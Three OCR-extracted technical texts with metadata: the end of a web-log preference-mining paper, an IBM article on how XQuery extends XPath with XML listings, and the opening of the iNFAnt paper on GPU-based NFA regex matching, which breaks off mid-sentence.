Preference-function (PF). The Preference-function will be composed of the multiplication of two variables: Likeness-factor and Time-factor. 3.2 Likeness-factor (LF) In this paper, the sessions are modeled as a finite state machine with each web page visited within a web-site defined as a state. Two additional states will be added, S and F, to denote the start and final states. The transition from each state to the next will be denoted as an edge on a weighted directed graph. The Likeness-factor is determined by summing the path weights (pw) of the individual paths that were used to reach a particular state. The path weights are defined as follows: each unique path toward a particular state by definition will be given a partial path weight of 1; any repetition that takes place, such as leaving the current page and then returning, will be given a partial path index of ½; and the total path weight for the path is determined by summing the values for the partial path weight of the unique path plus each of the various detours. The Likeness-factor (LF) is determined by adding various path weights to a particular state. The path weight of a state (s) is determined in equation (1) where “n” is the number of detours once a specified state is reached: \[ \text{pw}_s = 1 + \sum_{i=1}^{n} \text{pw}_i \] (1) The formula for the Likeness-factor is given by summing up all the path weights of all the paths (m) to a particular state (s): \[ \text{LF}_s = \sum_{j=1}^{m} \text{pw}_{sj} \] (2) 3.3 Time-factor (TF) The reference length approach (Cooley et. al., 1997) is based on the assumption that the amount of time a user spends examining an object is related to the interest of the user for the object’s contents. On this basis, a model for user sessions is obtained by distinguishing the navigational objects (i.e., containing only links interesting to the user) from the content objects (i.e., containing the information the user was looking for). The distinction between navigational and content accesses is related to the distance (in time) between one request and the next. This Time-factor is added to the evaluation function which was developed above in (1) and (2). The Time-factor (TF) considers that, generally, the more time a user spends on a web page, the higher interest the user has for information on that page. Therefore, the TF is determined by dividing the time (sec) at a single web page (determined from the web server logs) by the total time for that session, where “l” is the number of sessions. The formula for TF is shown in equation (3) where “l” is the number of total states and “p” is the number of times that the state “s” appears: \[ \text{TF}_s = \frac{\sum_{k=1}^{p} t_{sk}}{\sum_{k=1}^{l} t_{k}} \] (3) 3.4 Overall Equation From equations (2) and (3) we can compute the Preference-function as follows: \[ \text{Preference-function (PF}_w) = \text{Likeness-factor (LF}_w) \times \text{Time-factor (TF}_w) \] (4) 3.5 Example Suppose we have a web-site which consists of web pages A, B and C, and based on the server log it is known that a unique user used the following paths: \[ \{A \rightarrow B \rightarrow C \rightarrow B\} \] \[ \{A \rightarrow C \rightarrow B \rightarrow C \rightarrow C\} \] \[ \{B \rightarrow C \rightarrow B\} \] \[ \{C \rightarrow A \rightarrow B\} \] - Based on the first path, the path weights (pw) would be calculated as follows: \[ \text{pw}_{A \rightarrow B \rightarrow C} = 1 \] \[ \text{pw}_{C \rightarrow B} = 1/2 \] \[ \text{pw}_{SABC} = 1 \] The pwB1 for this path would be: \[ \text{pwB1} = 1 + \frac{1}{2} = 1 \frac{1}{2} \] - For the second path the pw session The pwB2 for the second path would be: \[ pwB2 = 1 \] For the third path, pwB would be as follows: \[ pw_{SCB} = 1 \] The pwB3 for the third path would be: \[ pwB3 = 1 + \frac{1}{2} = 1 \frac{1}{2} \] For the fourth path, pwB would be as follows: \[ pw_{CAB} = 1 \] The pwB4 for the fourth path would be: \[ pwB4 = 1 \] Therefore the Likeness-factor for site B would be equal to \[ LFB = pwB1 + pwB2 + pwB3 + pwB4 = 1 \frac{1}{2} + 1 + 1 \frac{1}{2} + 1 = 5 \] The overall graph is Also based on the server log it is known that the user spent 10 secs in A, 240 secs in B and 600 secs in C. Then the TF for each of the web pages becomes \[ \begin{align*} TF(A) &= \frac{10}{850} = 0.012 \\ TF(B) &= \frac{240}{850} = 0.282 \\ TF(C) &= \frac{600}{850} = 0.706 \end{align*} \] Therefore the Preference Factor for webpage B would be: \[ PFB = LFB \times TFB = 5 \times 0.282 = 1.41 \] 4 PROGRAMMING DESIGN AND IMPLEMENTATION 4.1 Programming Language Choice The programming language Java was used in creating the Preference-function Web Mining. Several other programming languages such as C++, Visual Basic, Perl or Python could have been used for this implementation. The Preference-factor Algorithm program can be shown as the following pseudo-code: ``` Begin Create GUI layout Show GUI Instantiate class variables Wait for action from user If "Mine Logs" button pressed { Display dialog box to choose file Open Server Log File Read Log File End ``` Break up each line into individual components Ip address, Date & Time, Command, Web page, Status, Bytes, Name, Zone, Type, Reference, Agent Create new record with components Eliminate all the unnecessary and null items(such as .gif, .jpg, .css., .png, .ico, search type, .db Create a session based on unique ip addresses and times Store within each session the web pages (states) and clock time Create a linked list of each session Within each session create various paths taken by the user Determine the time in seconds for each state Determine the Likeness-factor by following the paths and determining if any states are visited again Determine the total time for the session Determine the Time-factor for each web page by dividing the time by the total time Determine the Preference-function for each web page by multiplying the Likeness-factor and the Time-factor Determine the highest and second-highest preference factor and its web page Append to text area in GUI end if If “Web Site File” button pressed { Display dialog box to choose file Open web-site file } end if If “Suggested Action” button pressed { Read web-site file Check to see if each line is equal to the web page with the highest or second-highest Preference-function If equal then append text area with suggestions Close web-site file } end if If “Exit” button pressed Exit program End 5 EXPERIMENTAL PROCEDURE 5.1 Step 1: Server Log Analysis Data preparation is one of the central tasks in web mining (Baglioni et. al., 2003). In fact, it usually takes up most of the time of the total analysis process. First, unwanted requests, which are in the form of rows, need to be filtered out. These are usually image files, javascript files and style sheets, to name a few. Next, any unwanted information about the request needs to be filtered, such as the user identification, request method and query strings. The following are several lines from the server log file used for experimentation: - localhost - - [04/Feb/2004:15:09:36 -0500] "GET /phpdev/ HTTP/1.0" 200 383 - localhost - - [04/Feb/2004:15:09:36 -0500] "GET /phpdev/yak1.htm HTTP/1.0" 200 1048 - localhost - - [04/Feb/2004:15:09:36 -0500] "GET /phpdev/yak2.htm HTTP/1.0" 200 6798 5.2 Step 2: A Recommendation Scenario Ultimately the owner of the web-site has to give guidelines regarding the correlations and importance of web pages. This information is provided by the owner in the action file. Below is a sample action file for the sample web-site created for this project. For example, in the first line the web page name is ‘/phpdev/’ and the action to be taken is ‘php books’. /phpdev/ → php books /phpdev/yak1.htm → php books /phpmyadmin/ → php admin books /AnalogX/ → other web mining sites /site/ → Apache info /private/ → Apache info /start_here.htm → Apache directory information /phpinfo.php → php books 5.3 An Example of Preference-function Algorithm A GUI was designed to provide for an easy interaction between program and the user. There are four actions that a user can take shown in Figure 3. Figure 3: Four Actions When the “Mine Logs” button is pressed, a dialog box appears for the user to choose which server log file to open. Once the file has been opened, the results of the mining are shown. Next, a web-site action file has to be selected. This is done by pressing the “Web Site File” button. When this button is pressed, a dialog box appears to select the file to use for web-site actions. In order to get the suggested actions for the user preferred web-pages, the “Suggested Actions” button is pressed. 6 CONCLUSIONS When planning web applications, information about the users’ preferences makes designing web pages more relevant and useful. Being able to adapt web pages provides the flexibility needed in the ever-changing world of likes and dislikes. This paper implements a novel approach defined as the Preference-function Algorithm (PFA) for web-site adaptation. The algorithm extracts future preferences from users’ past web navigational data. Server web logs are used as navigational information to formulate the Preference-function. Using states to model each web page, all sessions are modeled as a finite state graph and the traverses among the various states are determined to be the path of a particular user. The viability of the Preference-function Algorithm is shown with a user-created web-site and the automatic creation of the server logs. The Preference-function is determined using the Likeness and Time-factors. The highest and second highest pages are determined to be the most preferred web pages by the unique users. REFERENCES
{"Source-Url": "http://www.scitepress.org/Papers/2005/25215/25215.pdf", "len_cl100k_base": 4884, "olmocr-version": "0.1.51", "pdf-total-pages": 7, "total-fallback-pages": 0, "total-input-tokens": 24094, "total-output-tokens": 5869, "length": "2e12", "weborganizer": {"__label__adult": 0.0003001689910888672, "__label__art_design": 0.0005106925964355469, "__label__crime_law": 0.00034046173095703125, "__label__education_jobs": 0.001708984375, "__label__entertainment": 0.00011301040649414062, "__label__fashion_beauty": 0.00014388561248779297, "__label__finance_business": 0.0005249977111816406, "__label__food_dining": 0.00029659271240234375, "__label__games": 0.000545501708984375, "__label__hardware": 0.00118255615234375, "__label__health": 0.0005564689636230469, "__label__history": 0.00035834312438964844, "__label__home_hobbies": 0.00013005733489990234, "__label__industrial": 0.0004208087921142578, "__label__literature": 0.0003712177276611328, "__label__politics": 0.00021970272064208984, "__label__religion": 0.00037288665771484375, "__label__science_tech": 0.14794921875, "__label__social_life": 0.00014388561248779297, "__label__software": 0.043548583984375, "__label__software_dev": 0.79931640625, "__label__sports_fitness": 0.0002310276031494141, "__label__transportation": 0.0003523826599121094, "__label__travel": 0.00022041797637939453}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 23419, 0.03711]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 23419, 0.77458]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 23419, 0.90418]], "google_gemma-3-12b-it_contains_pii": [[0, 3438, false], [3438, 8546, null], [8546, 12225, null], [12225, 15765, null], [15765, 17227, null], [17227, 20427, null], [20427, 23419, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3438, true], [3438, 8546, null], [8546, 12225, null], [12225, 15765, null], [15765, 17227, null], [17227, 20427, null], [20427, 23419, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 23419, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 23419, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 23419, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 23419, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 23419, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 23419, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 23419, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 23419, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 23419, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 23419, null]], "pdf_page_numbers": [[0, 3438, 1], [3438, 8546, 2], [8546, 12225, 3], [12225, 15765, 4], [15765, 17227, 5], [17227, 20427, 6], [20427, 23419, 7]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 23419, 0.0]]}
olmocr_science_pdfs
2024-12-03
2024-12-03
106cde485091ad084e631ed3ff6c281e4e4e66ad
How XQuery extends XPath Things you can do in XQuery but not XPath Donnie Cameron April 01, 2008 XPath and XQuery are similar in some ways. XPath is even an integral part of XQuery. Both languages allow you to select bits of data from an XML document or an XML document store. In this article, you'll find descriptions of XPath and XQuery, and learn how XQuery extends XPath. Although both XPath and XQuery perform some of the same functions, XPath provides simplicity and XQuery provides additional power and flexibility. XPath is the perfect tool for many types of queries. For example, XPath is the easiest way for you to create an unordered list of phone numbers from a subset of records in an XML document. However, if you need a query that expresses more complex record-selection criteria, transforms the result set, or requires recursion, then you need XQuery. XPath XPath is a domain-specific language (DSL) that is quickly becoming an important part of other more general-purpose languages. Programming languages are incorporating XPath through modules and classes, and in some cases directly into the languages' syntax. This is similar to what happened with regular expressions some time ago. XPath is popular because of the considerable amount of time and effort that the language can save a developer when extracting specific bits of data from an XML document. Even individuals who have never dealt with XPath before can quickly harness its power. Consider the XML fragment in Listing 1. Listing 1. XML Document ```xml <users> <user> <name> <first>Lola</first> <last>Solis</last> </name> </user> </users> ``` If you want to obtain a list of last names of the children in this document, you can use the following XPath expression. **Listing 2. Selecting the last names of the users that are under 18 years old** ```xml /user[age lt 18]/name/last/text() ``` (: Result Solis Serafina :) Imagine the code that you'd have to write to extract that data without XPath. Even with the help of regular expressions, you'd need to think a little about how to exclude the value from the last tag that's in the visits node. The above XPath expression is not only concise, but also quite clear. A quick glance reveals what the expression does, even to people that don't know XPath. XPath works because it is powerful and because it has a long history behind it. The language understands the nodes in an XML document of arbitrary complexity and, more importantly, the relationships among those nodes. So you can write concise expressions that consider not only elements and element values, but also attributes, processing instructions, and so on. Many XML queries are hard to express in a clearer and conciser manner than with XPath. But the DSL-nature of XPath and the language's goals impose some fairly serious limitations on the programmer. The sections that follow describe the XQuery language briefly and show problems that XPath alone cannot solve. These problems require the programmer to move beyond XPath to a tool like XQuery. **XQuery** Because XQuery supports XPath natively, as part of XQuery's syntax, XQuery clearly can do everything that XPath can do. But XQuery is Turing-complete and can be considered a general- purpose language; it easily overcomes many of the limitations of XPath, at the expense of introducing a little complexity. **Overview** XQuery uses a simple syntax that is a mix of XML, XPath, comments, functions, and a special expression syntax to tie it all together. XQuery code consists entirely of expressions with no statements. All values are sequences and simplicity is important to the language. So both of the expressions \texttt{Hi} and \texttt{2*2} are valid XQuery code that will execute without any prelude or modification. XQuery is a high-level, strongly-typed, functional language (free of side-effects) that is ideal to express a query to obtain data both from an XML document and a large XML document repository. In this last respect, it is much like SQL. But XQuery additionally provides for expressing an arbitrary transformation of the result set. Much like the use of XPath can be rewarding when you want to retrieve some data from an XML document, the use of XQuery can be quite rewarding when you want to retrieve and transform data from a large repository of XML documents. **Transforming the result set** One obvious limitation of XPath is that it doesn't provide for transforming the result set in any way. Suppose you wanted to return the results from the earlier XPath query (Listing 2) in alphabetical order, as shown in Listing 3. **Listing 3. Results in alphabetical order** <table> <thead> <tr> <th>Serafina</th> </tr> </thead> <tbody> <tr> <td>Solis</td> </tr> </tbody> </table> You can't do this with XPath. To achieve this, you'd have to write code in another language (like XQuery, for example) or use some special, proprietary XPath extension to sort the results. XQuery, on the other hand, allows you to sort the results or transform them into HTML, CSV, SQL, or any other text-based format. Among the most powerful types of transformations that you can do with XQuery are XML to XML transformations. Often, large XML databases can contain a large variety of complex, interrelated XML documents that a client application doesn't need. XQuery allows a client to describe precisely the type of XML document that it would like the server to return. By providing an XQuery interface, a server can often avoid keeping data in multiple schemas. Moreover, using XQuery to transform the data for a client is usually far easier and faster than attempting to transform the data with Perl or Java or some other popular computer language. Certainly, transforming data with XQuery when you retrieve the data is much faster in current implementations than performing a transformation later with XSLT. For tying together record-selection criteria and result-transformation instructions, XQuery provides a feature called a FLWOR (pronounced "flower") expression. The letters in the acronym stand for \texttt{for}, \texttt{let}, \texttt{where}, \texttt{order by}, and \texttt{return}. These are the elements that can make up a FLWOR expression. FLWOR expressions include at least some of those elements in roughly the order that the acronym suggests. All FLWOR expressions start with a \texttt{for} or a \texttt{let} expression and end with a \texttt{return} expression. If you're familiar with SQL, you might already see where I am headed with this. Here's a simple FLWOR expression, which borrows from Edwin Markham's poem, "Outwitted" (see Listing 4). **Listing 4. Simple FLWOR expression** ```xml let $xml:= <a> <one>She drew a circle that shut me out</one> <two>Heretic rebel, a thing to flout</two> </a> return $xml//one/text() (: Result "She drew a circle that shut me out" :) ``` Listing 5 shows how you can apply a simple FLWOR expression to the XML in Listing 1. (For brevity, the listing shows the text _XML from Listing 1_ in place of the actual XML that belongs there.) **Listing 5. Simple FLWOR expression** ```xml let $xml:= _XML from Listing 1_ for $user in $xml//user[age lt 18] order by $user/name/last return $user/name/last/text() (: Result Serafina Solis :) ``` If you wanted the query to return an HTML fragment representing the result as a numbered list, you can apply the XQuery from Listing 6. **Listing 6. Simple FLWOR expression that outputs a numbered list in HTML** ```xml let $xml:= _XML from Listing 1_ return <ol>{ for $user in $xml//user[age lt 18] order by $user/name/last return <li>{$user/name/last/text()}</li> }<ol> (: Result <ol><li>Serafina</li><li>Solis</li></ol> :) ``` Notice how XML and XQuery mix so intuitively and effectively in Listing 6. **Expressing more complex record-selection criteria** Aside from transforming the data that it retrieves, XQuery is also a lot better than XPath at finding data in the first place. XQuery and XPath often provide redundancy, which can help programmers be more expressive with queries. For example, Listing 7 shows how you can move the XPath expression fragment `age lt 18` into a `where` clause in the FLWOR expression. Listing 7. Expressing XPath constraints in XQuery ``` let $xml:= _XML from Listing 1_ return <ol> for $user in $xml//user where $user/age lt 18 order by $user/name/last return <li>{$user/name/last/text()}</li> </ol> ``` The result that the expression in Listing 7 produces is exactly the same as the result of the expression in Listing 6. But XQuery’s `where` clause is significantly more flexible than the XPath syntax for expressing constraints. The XQuery `where` clause can consist of nested expressions of arbitrary complexity that can even include function calls. XQuery doesn’t impose limitations on record-selection expressions. Using functions and recursion While XPath doesn’t support functions, XQuery provides a substantial collection of built-in functions and operators and also allows users to define functions of their own. XQuery functions are strongly typed, support recursion, and can be declared as internal or external. An internal function is a standard function where the function body follows the function declaration. An external function is a type of function declaration that opens the door for implementations to allow the user to define the body of the function in a different programming language. While recursion might not be the best approach for the tasks that many of developers undertake day to day, it often comes in handy when you work with XML, which can contain arbitrarily nested nodes. Consider the `transform-names` function defined in Listing 8. Listing 8. Simple function to change node names in any XML document ``` (: Part 1 :) define function transform-names($node as node()) as node() { element{replace(name($node), " ", ".")} { $node/text(), for $subnode in $node/* return transform-names($subnode) } } (: Part 2 :) let $xml:= <item> <item_type>book</item_type> <contributors> <author> <first_name>Charles</first_name> <last_name>Edward</last_name> <home_address> <home_street>206 S. Solomon St.</home_street> <home_city>New Orleans</home_city> <home_state>LA</home_state> <home_zip>70119</home_zip> </home_address> </author> <artist> <last_name>Salinas</last_name> </artist> </contributors> </item> ``` return transform-names($xml) (: Result <item> <item-type>book</item-type> <contributors> <author> <first-name>Charles</first-name> <last-name>Edward</last-name> <home-address> <home-street>206 S. Solomon St.</home-street> <home-city>New Orleans</home-city> <home-state>LA</home-state> <home-zip>70119</home-zip> </home-address> </author> <artist> <last-name>Salinas</last-name> </artist> </contributors> </item> :) The transform-names function, which amounts merely to the code that appears in Part 1 of Listing 8, accepts an XML document or node of arbitrary complexity. In every XML tag name, the function replaces any underscore character (_) with a dash character (-). Recursion in this case makes it trivial for the function to traverse the structure of the document. As a result, the function is succinct (3 lines!), easy to maintain, and works with any valid XML document or node that doesn't use attributes. Even if the function seems a little difficult to grasp completely at first—especially for programmers that don't often resort to recursion—one might quickly guess how to modify the function to delete underscores instead of replacing them with dashes. **Expressing joins** XPath doesn't provide a means to join XML nodes in a query. However, just like SQL provides a natural syntax to express table-joins in queries, XQuery provides an intuitive (at least to SQL users) way to join sets of XML nodes. The code in Listing 9 describes how joins work in XQuery. **Listing 9. XQuery join expression** (: Part 1 :) let $authors:= <authors> <author> <name>Harold Abelson</name> <books> <isbn>978-0-07-000422-1</isbn> <isbn>978-0-262-01063-4</isbn> </books> </author> <author> <name>Paul Graham</name> <books> <isbn>978-0-13-370875-2</isbn> <isbn>978-0-13-038552-7</isbn> <isbn>978-0-596-00662-4</isbn> </books> </author> </authors> <author> <name>Apostolos-Paul Refenes</name> <books> <isbn>978-0-471-94364-8</isbn> <isbn>978-981-02-2819-4</isbn> </books> </author> (: Part 2 :) let $books:= <books> <book> <title>Structure and Interpretation of Computer Programs</title> <isbn>978-0-07-000422-1</isbn> </book> <book> <title>Turtle Geometry</title> <isbn>978-0-262-01063-4</isbn> </book> <book> <title>ANSI Common LISP</title> <isbn>978-0-13-370875-2</isbn> </book> <book> <title>On LISP</title> <isbn>978-0-13-030552-7</isbn> </book> <book> <title>Hackers and Painters</title> <isbn>978-0-596-00662-4</isbn> </book> <book> <title>Neural Networks in the Capital Markets</title> <isbn>978-0-471-94364-8</isbn> </book> <book> <title>Neural Networks in Financial Engineering</title> <isbn>978-0-981-02-2819-4</isbn> </book> <book> <title>Handbook of Artificial Intelligence</title> <isbn>978-0-201-16889-1</isbn> </book> <book> <title>Artificial Intelligence Programming</title> <isbn>978-0-89859-609-0</isbn> </book> <book> <title>A New Guide to Artificial Intelligence</title> <isbn>978-0-89391-607-7</isbn> </book> <book> <title>Artificial Intelligence</title> <isbn>978-0-08-034112-5</isbn> </book> <book> <title>Artificial Intelligence</title> <isbn>978-0-631-18385-3</isbn> </book> </books> (: Part 3 :) return <books-complete-info>{ for $book in $books/* for $author in $authors/* order by $book/title return <book>{$book/*, $author/name}</book></books-complete-info> Parts 1 and 2 of Listing 9 assign XML documents to the variables authors and books. Some of the nodes in books relate to nodes in authors, such that a book node has an ISBN that is among the ones listed for an author node. Part 3 of the listing contains an XQuery join expression that assembles a new XML document, books-complete-info (look ahead in Listing 10), that contains book nodes that include the author's name. Note a few remarkable things about the code in Part 3 of Listing 9. The two for expressions near the beginning of that code hint to XQuery that this will be a join expression. The where clause is similar conceptually to what one might write in SQL to achieve the join. But notice that an author node can have multiple ISBNs, which requires that the where clause effectively mean: "where the book's ISBN is among the author's ISBNs". This compares more to a sub-select within an SQL where clause, but the XQuery syntax seems more intuitive and natural. And certainly the XQuery expression is more concise. Listing 10. Results from an XQuery join expression <books-complete-info> <book> <title>ANSI Common LISP</title> <isbn>978-0-13-370875-2</isbn> <name>Paul Graham</name> </book> <book> <title>On LISP</title> <isbn>978-0-13-030552-7</isbn> <name>Paul Graham</name> </book> <book> <title>Neural Networks in the Capital Markets</title> <isbn>978-0-471-94364-8</isbn> <name>Apostolos-Paul Refenes</name> </book> <book> <title>Neural Networks in Financial Engineering</title> <isbn>978-981-02-2819-4</isbn> <name>Apostolos-Paul Refenes</name> </book> </books-complete-info> Summary XPath is a mature DSL that should be your first choice to get to a piece of data that is buried deep in an XML document or repository. But, XPath was not designed to handle many kinds of problems. As you saw in this article, XQuery extends XPath vastly, emerging as the tool of choice when you have complex data selection requirements or you need to return results that are sorted, specially formatted, or otherwise transformed. Related topics - **W3C Recommendation for XQuery 1.0 Specification**: Read the details on this query language designed to be broadly applicable across many types of XML data sources. - **W3C Recommendation for XQuery 1.0 and XPath 2.0 Functions and Operators**: Explore this catalog of the functions and operators required for XPath 2.0, XML Query 1.0 and XSLT 2.0. - **W3C XML Query Use Cases**: Look at usage scenarios for XQuery. - **What is XQuery** (Per Bothner. O'Reilly xml.com, October 2002): Read this high level view of XQuery that introduces main ideas that you should understand before you go deeper or actually try to use it. - **Process XML using XQuery** (Nicholas Chase, developerWorks, March 2007): In the tutorial, see how to use XQuery to retrieve information from an XML document stored in an XQuery-enabled database. - **An Introduction to XQuery** (Howard Katz, developerWorks, January 2006): Get some background history, a road map into the documentation, and a snapshot of the current state of the XQuery specification. - **XML Schema Part 2: Datatypes Second Edition**: Peruse the specification for the XML Schema language as it defines facilities for defining datatypes to be used in XML Schemas as well as other XML specifications. - **XPath Recommendation**: Read more on XPath, a language for addressing parts of an XML document that is designed for use by both XSLT and XPointer. - **XML Path Language (XPath) 2.0**: See where XPath is going. - **Turing test**: Read about a proposal for a test of a machine’s capability to demonstrate intelligence, on Wikipedia. - **Find out how you can become an IBM-Certified Developer.** - **XML technical library**: See the developerWorks XML Zone for a wide range of technical articles and tips, tutorials, standards, and IBM Redbooks. - **DB2 Express-C 9.5**: Download and try the XML database used for this tutorial. - **IBM trial software**: Build your next development project with trial software available for download directly from developerWorks.
{"Source-Url": "https://www.ibm.com/developerworks/library/x-xqueryxpath/x-xqueryxpath-pdf.pdf", "len_cl100k_base": 4511, "olmocr-version": "0.1.49", "pdf-total-pages": 9, "total-fallback-pages": 0, "total-input-tokens": 19390, "total-output-tokens": 5289, "length": "2e12", "weborganizer": {"__label__adult": 0.00026035308837890625, "__label__art_design": 0.0001862049102783203, "__label__crime_law": 0.0001876354217529297, "__label__education_jobs": 0.00021708011627197263, "__label__entertainment": 4.595518112182617e-05, "__label__fashion_beauty": 7.957220077514648e-05, "__label__finance_business": 0.00010079145431518556, "__label__food_dining": 0.0002312660217285156, "__label__games": 0.00021326541900634768, "__label__hardware": 0.00039124488830566406, "__label__health": 0.00018775463104248047, "__label__history": 0.00011408329010009766, "__label__home_hobbies": 4.410743713378906e-05, "__label__industrial": 0.00016427040100097656, "__label__literature": 0.0001462697982788086, "__label__politics": 9.5367431640625e-05, "__label__religion": 0.0002715587615966797, "__label__science_tech": 0.0028057098388671875, "__label__social_life": 6.502866744995117e-05, "__label__software": 0.01230621337890625, "__label__software_dev": 0.9814453125, "__label__sports_fitness": 0.00014472007751464844, "__label__transportation": 0.00016808509826660156, "__label__travel": 0.0001327991485595703}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 18536, 0.03668]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 18536, 0.32504]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 18536, 0.82576]], "google_gemma-3-12b-it_contains_pii": [[0, 1679, false], [1679, 3299, null], [3299, 6521, null], [6521, 8217, null], [8217, 10514, null], [10514, 12596, null], [12596, 14221, null], [14221, 16512, null], [16512, 18536, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1679, true], [1679, 3299, null], [3299, 6521, null], [6521, 8217, null], [8217, 10514, null], [10514, 12596, null], [12596, 14221, null], [14221, 16512, null], [16512, 18536, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 18536, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 18536, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 18536, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 18536, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 18536, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 18536, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 18536, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 18536, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 18536, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 18536, null]], "pdf_page_numbers": [[0, 1679, 1], [1679, 3299, 2], [3299, 6521, 3], [6521, 8217, 4], [8217, 10514, 5], [10514, 12596, 6], [12596, 14221, 7], [14221, 16512, 8], [16512, 18536, 9]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 18536, 0.01045]]}
olmocr_science_pdfs
2024-11-27
2024-11-27
47e3420910dd847890e12874a500febb3a58d6e0
ABSTRACT This paper presents iNFAnt, a parallel engine for regular expression pattern matching. In contrast with traditional approaches, iNFAnt adopts non-deterministic automata, allowing the compilation of very large and complex rule sets that are otherwise hard to treat. iNFAnt is explicitly designed and developed to run on graphical processing units that provide large amounts of concurrent threads; this parallelism is exploited to handle the non-determinism of the model and to process multiple packets at once, thus achieving high performance levels. Categories and Subject Descriptors C.2.3 [Computer-Communication Networks]: Network Operations General Terms Experimentation, Algorithms Keywords NFA, pattern matching, CUDA, GPGPU, regular expression 1. INTRODUCTION Pattern matching, i.e. the task of matching a string of symbols against a set of given patterns, plays an important role in multiple fields that range from bioinformatics (e.g. for analyzing DNA sequences) to high-speed packet processing, where it is a critical component for packet filtering, traffic classification and, in general, deep packet inspection. Pattern matching is commonly performed by expressing patterns as sets of regular expressions and converting them into finite state automata (FSAs), mathematical models that represent (potentially infinite) sets of strings. The behavior of FSAs is simple to emulate on computing devices in order to perform the actual matching procedure and finite automata can be easily composed together with the full set of boolean operators. Two kinds of FSAs are known from the literature, deterministic (DFA) and non-deterministic (NFA). While automata theory proves them equivalent in terms of expressiveness, their practical properties are different: NFA traversal requires, by definition, non-deterministic choices that are hard to emulate on actual, deterministic processors; on the other hand DFAs, while fast to execute, can be less space-efficient, requiring very large amounts of memory to store certain peculiar patterns that are rather common in practice (the so-called state space explosion) [2]. In general, software-based NFA implementations suffer from a higher per-byte traversal cost when compared with DFAs: intuitively, this is because multiple NFA states can be active at any given step, while only a single one must be considered when processing DFAs. So far software research has been focused mainly on DFAs, as they provide a relatively easy way to achieve high throughputs; many efforts have been aimed at solving the inherent downsides of this model and avoid the aforementioned memory explosion. At the same time, NFAs have often been relegated to the design of hardware devices (e.g. FPGAs) that can easily mimic their behavior, or for use where high throughput is not the primary concern (e.g. many general-purpose pattern-matching libraries). This paper presents iNFAnt, a NFA-based regular expression engine running on graphical processing units (GPUs). iNFAnt represents a significant departure from traditional software-based pattern matching engines both for its underlying automaton model, the NFA, and its target hardware platform, the GPU. NFA adoption allows iNFAnt to efficiently store very large regular expression sets in a limited amount of memory while the parallelism offered by the underlying hardware helps countering the higher per-byte traversal cost of NFAs with respect to DFAs and the higher instruction execution time of GPUs with respect to CPUs. iNFAnt also represents, as far as we know, one of the first approaches to pattern matching designed from the ground up for the heavily parallel execution environment offered by the modern programmable GPUs, as opposed to being an adaptation of a technique originally designed for general-purpose processors. 2. RELATED WORKS It is common knowledge that pattern matching is the most time-expensive operation to be performed in intrusion detection systems and similar applications: accelerating its execution has been the object of several academic works. Some of them have already considered the idea of using the parallelism offered by GPUs. It is possible either to try to execute the whole packet processing application on a graphical device or to accelerate only the pattern matching portion. The first case saw the development of Gnort [7], a full port of the Snort IDS\(^1\) to a GPU environment. \(^1\)Available at http://www.snort.org/. Gnort did not initially support regular expressions, delegating them to the host CPU; it has since extended with a DFA-based regex engine [8]. DFA approaches, however, incur in state space explosion, typically solved by heuristically splitting the rules into smaller subsets or (as Gnort does) translating only a “well-behaved” subset while keeping the rest in NFA form for host processing [8]. Both solutions are suboptimal for our goals as splitting leads to inefficiencies (all the DFAs must be traversed) while resorting to host processing defeats the goal of graphical hardware adoption. Other more advanced approaches for countering the DFA state explosion problem have been proposed, such as HFAs [1] that split the DFA under construction at the point where state space explosion would happen. There have been some experiences in porting advanced techniques, such as XFAs [5], to GPUs; however adapting a traversal algorithm designed for CPUs on a GPU-based device is not straightforward or efficient because of deep architectural differences. Other techniques described in the literature use GPUs to perform preprocessing steps or, alternatively, employ inexact algorithms to perform matching (e.g. [6]). These approaches are out of scope for the purpose of this paper, aimed at a full-fledged regex engine. Perhaps the work most closely related to iNFAnt is reported in [4] and describes methods to run DFAs and NFAs on a high-speed single-instruction, multiple data (SIMD) processor. While NFAs are recognized as a viable technique on parallel hardware and for reducing memory consumption, the proposed algorithm implements only a subset of the regular expression operators; moreover it considers an 